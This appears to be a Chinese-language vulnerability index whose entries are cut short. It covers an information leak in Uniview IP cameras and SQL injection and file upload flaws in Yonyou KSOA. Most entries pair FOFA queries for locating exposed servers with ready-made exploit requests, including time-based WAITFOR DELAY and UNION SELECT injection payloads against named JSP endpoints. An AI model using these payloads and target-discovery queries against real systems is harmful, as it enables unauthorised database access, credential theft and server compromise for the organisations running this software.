Y23-1宇视科技-视频监控-InformationLeakage 漏洞描述: 宇视(Uniview)高清网络摄像机存在信息泄露漏洞,攻击者可以通过解密泄露信息获取管理员账号密码,登陆后台控制整个系统,最终导致系统处于极度不安全状态。 网站图片: 网络测绘: fofa语法: FOFA:app=“un
Y22-14用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 fofa语法: app=“用友-时空KSOA”
Y22-13用友-时空KSOA-SQL 漏洞复现: payload: GET /kp/fillKP.jsp?kp_djbh=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) A
Y22-12用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 延时5秒 payload: GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: User-Agent: M
Y22-11用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 查询第一个数据库名称 payload: GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(1),4,5,6,7,8,9,10,11,
Y22-10用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 延时3秒,执行2次 payload: GET /kp/PrintZPFB.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1 Host
Y22-9用友-时空KSOA-SQL 漏洞复现: 延时5秒,执行2次 payload: GET /kp/PrintZP.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 Host: User-Agent: Mozilla/5.0
Y22-8用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务
Y22-7用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标
Y22-6用友-时空KSOA-文件上传 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞